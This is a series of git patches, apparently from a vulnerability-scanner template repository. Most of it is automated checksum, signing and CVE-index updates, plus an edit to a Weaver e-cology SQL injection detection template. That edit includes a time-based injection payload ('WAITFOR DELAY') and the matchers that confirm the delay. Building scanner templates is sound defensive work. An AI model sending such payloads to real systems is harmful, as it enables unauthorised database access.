{"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 5a7a839736..0f04878fbc 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -16fc811297044b5d3f7904cafbfd9424 +2a9dac7ed37848256e768a0872ce4e60 From b99856550cbcd72eb5a063423573efaa8bd0d2c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 10:50:34 +0000 Subject: [PATCH 18/36] Auto Generated Templates Checksum [Fri Nov 3 10:50:34 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bfe2a025bd..5a47bf8ee0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2616,7 +2616,7 @@ http/cves/2023/CVE-2023-22463.yaml:d2440a47082ab058aabcb2ca3655fce7305bc37e http/cves/2023/CVE-2023-22478.yaml:c62d76dd2ea11531093a0569fb16255f67211392 http/cves/2023/CVE-2023-22480.yaml:c89ac259667de547b9d4dde653a4f0ea5b47c7d6 http/cves/2023/CVE-2023-22515.yaml:7811582f649c5efef338ffa8fc7d123feb7b66e4 -http/cves/2023/CVE-2023-22518.yaml:eb71ae85f61f478bfa39b014f47cb6d012a2b91f +http/cves/2023/CVE-2023-22518.yaml:c224fc98b21c3bf8e4b3737b6e083c88856fd9a8 http/cves/2023/CVE-2023-2252.yaml:bb02189bc936b107119e8db698983075c295bb78 http/cves/2023/CVE-2023-22620.yaml:d17b60c3caac0cf4bee31e6d9700899a1c8a41a2 http/cves/2023/CVE-2023-2272.yaml:8273092cf0ee581de5f8b05df388aa571c7e5f1d @@ -2717,6 +2717,7 @@ http/cves/2023/CVE-2023-3345.yaml:ee7e66cef0e8cc47194b1d7bcba3a8d698e0efbc http/cves/2023/CVE-2023-33510.yaml:584783e7e2bcb7fcfcc80ff9c6f69082a8421588 http/cves/2023/CVE-2023-33568.yaml:1d011ba1da235f3ea8be9e4aecc0bded63880891 http/cves/2023/CVE-2023-33584.yaml:c4cf1d0936b4e9b27cc588c9fbb095314bbd83e6 +http/cves/2023/CVE-2023-33629.yaml:7d5005a1d6525a3f3bf73622f96106f5a4252077 http/cves/2023/CVE-2023-33831.yaml:80d23fe2ef175f85281e3ece9bc0d80483a71076 http/cves/2023/CVE-2023-34124.yaml:69062685da0bdae5b2f28b9c223bee8e6875dba8 http/cves/2023/CVE-2023-34192.yaml:28489dac8688431c2f02197e54b6e93b048b3320 @@ -7517,7 +7518,7 @@ ssl/tls-version.yaml:07fa612fd325ec70b698e4a4e1c0d6e7a5a399bc ssl/untrusted-root-certificate.yaml:867f13cbcd5d5a3d8e1c25051b362bd33063d471 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:2b6428151a52df66756557b54dd82242540bdf49 +templates-checksum.txt:ecec7ee0aa85e7a98c04aeac11dbd46fe3649ca9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 15208b8a09775593d50e9b03a3e859976150104a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 3 Nov 2023 16:23:09 +0530 Subject: [PATCH 19/36] Update ecology-oa-file-sqli.yaml --- .../vulnerabilities/other/ecology-oa-file-sqli.yaml | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index 17c641b7b2..25dff24550 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -24,7 +24,7 @@ http: isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7' - | - @timeout: 25s + @timeout: 35s POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 Host: {{Hostname}} @@ -34,15 +34,10 @@ http: matchers: - type: dsl dsl: - - 'duration_1>=7' - - 'status_code_1 == 200' + - 'duration_1>=7 && status_code_1 == 200' - 'contains(header_1, "ecology_JSessionid=")' - condition: and - - - type: dsl - dsl: - - 'duration_2>=15' - - 'status_code_2 == 200' + - 'duration_2>=15 && status_code_2 == 200' - 'contains(header_2, "ecology_JSessionid=")' condition: and + # digest: 4a0a004730450220706de22bcda877d015e3158b4912359fceab8b5c6888f625675921c48ebf595f022100baf7463de1956ebc43063ae318c3e1e9b4ee0e96dc1652136e8c0b3c68ae1978:922c64590222798bb761d5b6d8e72950 From f4dd644a43ec26b2e75b7b5980acdb8fae4498eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 10:53:26 +0000 Subject: [PATCH 20/36] Auto Template Signing [Fri Nov 3 10:53:26 UTC 2023] :robot: --- http/cves/2023/CVE-2023-33629.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 7b2491eb00..f43c1a6f3a 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -38,3 +38,4 @@ http: - status_code_2 == 200 - contains_all(body_2, 'www', 'www_multi') condition: and +# digest: 4a0a00473045022100db94e1fe397ec05484776a74d461a3e880e96490a66eae98dfbec0e3228ba8d402204c7f02417a8fa4a69743cae52639d07e90359df81065d0e4e9aadf828fc4fa50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 29a877b34dd04133892e91efd9f1ca3b26b047e7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 10:57:34 +0000 Subject: [PATCH 21/36] Auto Generated Templates Checksum [Fri Nov 3 10:57:34 UTC 2023] :robot: --- templates-checksum.txt | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5a47bf8ee0..385c17b88d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:32a18b1bf7105fcb77c67cc8d2ca838c68d0fab4 TEMPLATES-STATS.md:c7dda2c49bac155636b962eae6876dadd80db64b TOP-10.md:0f799e67965147a5878794b88347a80208acd861 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:438fb9e87dd9f8e45e23e40445e4725eea346f15 -cves.json-checksum.txt:75131eada8a74f30091dbffca9e417983e074415 +cves.json:127f387caaac08aa73518c48560e05490897a41a +cves.json-checksum.txt:f237bdbb6a0b1f5495a0f7d0c79964dc2286e2e6 dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:45150389d7901c8ec9d9412f96172588aee2f33a @@ -2717,7 +2717,7 @@ http/cves/2023/CVE-2023-3345.yaml:ee7e66cef0e8cc47194b1d7bcba3a8d698e0efbc http/cves/2023/CVE-2023-33510.yaml:584783e7e2bcb7fcfcc80ff9c6f69082a8421588 http/cves/2023/CVE-2023-33568.yaml:1d011ba1da235f3ea8be9e4aecc0bded63880891 http/cves/2023/CVE-2023-33584.yaml:c4cf1d0936b4e9b27cc588c9fbb095314bbd83e6 -http/cves/2023/CVE-2023-33629.yaml:7d5005a1d6525a3f3bf73622f96106f5a4252077 +http/cves/2023/CVE-2023-33629.yaml:1baea7ab1ad905bcfc27034c80e7230fbf5bd396 http/cves/2023/CVE-2023-33831.yaml:80d23fe2ef175f85281e3ece9bc0d80483a71076 http/cves/2023/CVE-2023-34124.yaml:69062685da0bdae5b2f28b9c223bee8e6875dba8 http/cves/2023/CVE-2023-34192.yaml:28489dac8688431c2f02197e54b6e93b048b3320 @@ -6585,8 +6585,14 @@ http/vulnerabilities/avtech/avtech-auth-bypass.yaml:41c9e6cc906260b6f25966c1726d http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml:cc5b00277d590083d64dddf48f7c50700be8d7e3 http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:8d35ad8973b365783595f5a25a26e469d6aae45c http/vulnerabilities/avtech/avtech-verification-bypass.yaml:86e688a4d783b621c2b7340676a320b542376eaf +http/vulnerabilities/backdoor/antsword-backdoor.yaml:66bca1b81f43577f983c1b4bb437dec48dc60bad http/vulnerabilities/backdoor/cisco-implant-detect.yaml:77831f20819b948e17f70a7f1a7f9239634c4a88 +http/vulnerabilities/backdoor/fatpipe-backdoor.yaml:79c76afb42389be4634d42777a1d4bd0cfa26f34 http/vulnerabilities/backdoor/jexboss-backdoor.yaml:97064905cdfd019872ba00fdf7284438d314bb15 +http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7c2f1d78897dd98d891 +http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 +http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 +http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 http/vulnerabilities/bsphp-info.yaml:62655793c49f73f68f11e0ec94e376a19190fa66 http/vulnerabilities/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/cisco/cisco-broadworks-log4j-rce.yaml:3070256081971e4f208ed755a51b3cd278a5d1d9 @@ -6719,7 +6725,6 @@ http/vulnerabilities/other/aerocms-sqli.yaml:0675d56ee1ca6f5b517faf360c70ec85b05 http/vulnerabilities/other/aic-intelligent-password-exposure.yaml:f31b5c3d8bb7576bb724006be70b2292bef58122 http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:8f2df5e926df95640a1088dd9c2205745d4c321c http/vulnerabilities/other/alumni-management-sqli.yaml:2081bab7f89adfc3b06d21f021cb5a0cd2448527 -http/vulnerabilities/other/antsword-backdoor.yaml:66bca1b81f43577f983c1b4bb437dec48dc60bad http/vulnerabilities/other/apache-druid-log4j.yaml:2d842bf434687c90116ff6ac418f9cf25345f58e http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 @@ -6790,7 +6795,6 @@ http/vulnerabilities/other/eyelock-nano-lfd.yaml:4d7585f47be6a4c23b09cafc420ab8e http/vulnerabilities/other/f-secure-policymanager-log4j-rce.yaml:d86b16469342638a6afcaf21af04d0c8d3976705 http/vulnerabilities/other/fanruanoa2012-disclosure.yaml:7de55d9312193322c47da705fc415993a17b6b9f http/vulnerabilities/other/fatpipe-auth-bypass.yaml:f4d35fbb62d240efc6740aaa825a7bc0df8b20f3 -http/vulnerabilities/other/fatpipe-backdoor.yaml:79c76afb42389be4634d42777a1d4bd0cfa26f34 http/vulnerabilities/other/feifeicms-lfr.yaml:fc9d3c9329a5a481964cfc31f0e7f3e7e1589ef4 http/vulnerabilities/other/finecms-sqli.yaml:2999c4ff5d5ff94783eb74a73689df83303ed7d1 http/vulnerabilities/other/flatpress-xss.yaml:1e33b50dafe6c0d9cd1ce67ad1658bef67a45ce9 @@ -6849,9 +6853,7 @@ http/vulnerabilities/other/joomla-jmarket-xss.yaml:661fc465dce5cd0aeee047d87efeb http/vulnerabilities/other/kafdrop-xss.yaml:5104b4c44e084a93e54e8e639d60d82bebfa268d http/vulnerabilities/other/karel-ip-phone-lfi.yaml:8d06faad18448c5af5c3f51cc9fd7e23dd6dfd70 http/vulnerabilities/other/kavita-lfi.yaml:ec137e81b229bb377f588c375fa4e0917230a0c5 -http/vulnerabilities/other/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7c2f1d78897dd98d891 http/vulnerabilities/other/kevinlab-bems-sqli.yaml:8855228a5dbf6fbe577516f0c1968f676c4afed1 -http/vulnerabilities/other/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/other/keycloak-xss.yaml:800b9fbb215a3607f339f0bf9005b6d85af4dbae http/vulnerabilities/other/khodrochi-cms-xss.yaml:598df8395e7e1a1d4a3747f6ade263ef1afa421c http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:2d4acac5bff94a82180da8c75c0e227e9e08597b @@ -6872,7 +6874,6 @@ http/vulnerabilities/other/lokomedia-cms-lfi.yaml:2b8591c11a5040efee4a976c3f8a35 http/vulnerabilities/other/lotuscms-rce.yaml:c5023b88d3d12f33b30f820f815bccadab6bb84a http/vulnerabilities/other/lucee-xss.yaml:bf46b7df537d0e96295794584ba9be72f6bc5144 http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml:b95bcc59492b2b8444b4a3acc1fe6786f3c3fbc7 -http/vulnerabilities/other/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/other/magicflow-lfi.yaml:b78ea8ecabdd5ce6e9e8c5de70b276909c951d24 http/vulnerabilities/other/maltrail-rce.yaml:ec63eac2269dd99e0f9ea4266a700b918834a1e5 http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml:99369b5d57859573371f3e584f2c3d2099fc36b9 @@ -6926,7 +6927,6 @@ http/vulnerabilities/other/pbootcms-database-file-download.yaml:3f95c8148c2c9c91 http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml:a993ed237a81ae7b0880ce4922e480339ee066ed http/vulnerabilities/other/pega-log4j-rce.yaml:c0acb963042d5d8306a6b3bc5e88e98177538435 http/vulnerabilities/other/php-timeclock-xss.yaml:c4bbf7b0a3a897cd2704d071e464c1dca7792fdc -http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 http/vulnerabilities/other/phpldapadmin-xss.yaml:af368abbe22b3da109ec2f32e04a5c90eb55380b http/vulnerabilities/other/phpok-sqli.yaml:47a8896d38eb3940ee773e0f053e00a4d28c6910 http/vulnerabilities/other/phpwiki-lfi.yaml:37fa61e3fc028ebe9d2996fbdf38cd6015264740 @@ -7518,7 +7518,7 @@ ssl/tls-version.yaml:07fa612fd325ec70b698e4a4e1c0d6e7a5a399bc ssl/untrusted-root-certificate.yaml:867f13cbcd5d5a3d8e1c25051b362bd33063d471 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:ecec7ee0aa85e7a98c04aeac11dbd46fe3649ca9 +templates-checksum.txt:bb328ca0faafb012572b6102fe92094a78e38181 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d9c464e1367f3d7317bae7e6f963f14887d77711 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 10:59:12 +0000 Subject: [PATCH 23/36] TemplateMan Update [Fri Nov 3 10:59:12 UTC 2023] :robot: --- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2004/CVE-2004-0519.yaml | 2 +- http/cves/2004/CVE-2004-1965.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2005/CVE-2005-4385.yaml | 2 +- http/cves/2006/CVE-2006-1681.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1059.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-1547.yaml | 2 +- http/cves/2008/CVE-2008-2398.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4668.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6080.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-6982.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 2 +- http/cves/2009/CVE-2009-0347.yaml | 2 +- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1496.yaml | 2 +- http/cves/2009/CVE-2009-1558.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-2015.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 2 +- http/cves/2009/CVE-2009-3053.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-4679.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2009/CVE-2009-5114.yaml | 2 +- http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 2 +- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0696.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0943.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-0982.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1056.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 2 +- http/cves/2010/CVE-2010-1217.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1302.yaml | 2 +- http/cves/2010/CVE-2010-1304.yaml | 2 +- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1315.yaml | 2 +- http/cves/2010/CVE-2010-1340.yaml | 2 +- http/cves/2010/CVE-2010-1345.yaml | 2 +- http/cves/2010/CVE-2010-1352.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1470.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1472.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1478.yaml | 2 +- http/cves/2010/CVE-2010-1491.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 4 ++-- http/cves/2010/CVE-2010-1495.yaml | 2 +- http/cves/2010/CVE-2010-1531.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 2 +- http/cves/2010/CVE-2010-1586.yaml | 2 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1658.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1714.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1717.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1722.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1858.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1878.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1954.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1979.yaml | 2 +- http/cves/2010/CVE-2010-1980.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-1983.yaml | 2 +- http/cves/2010/CVE-2010-2033.yaml | 2 +- http/cves/2010/CVE-2010-2034.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2045.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2122.yaml | 2 +- http/cves/2010/CVE-2010-2128.yaml | 2 +- http/cves/2010/CVE-2010-2259.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2682.yaml | 2 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-2920.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 2 +- http/cves/2010/CVE-2010-3426.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 2 +- http/cves/2010/CVE-2010-4282.yaml | 2 +- http/cves/2010/CVE-2010-4617.yaml | 2 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2010/CVE-2010-4769.yaml | 2 +- http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 2 +- http/cves/2010/CVE-2010-5286.yaml | 2 +- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4618.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5107.yaml | 2 +- http/cves/2011/CVE-2011-5179.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5252.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 2 +- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 2 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 2 +- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-0996.yaml | 2 +- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1823.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-2371.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 2 +- http/cves/2012/CVE-2012-4032.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4253.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4940.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 4 ++-- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-2621.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5528.yaml | 2 +- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 2 +- http/cves/2013/CVE-2013-7285.yaml | 2 +- http/cves/2014/CVE-2014-10037.yaml | 2 +- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4513.yaml | 2 +- http/cves/2014/CVE-2014-4535.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4544.yaml | 2 +- http/cves/2014/CVE-2014-4550.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4592.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-4942.yaml | 2 +- http/cves/2014/CVE-2014-5111.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8676.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9119.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 2 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- 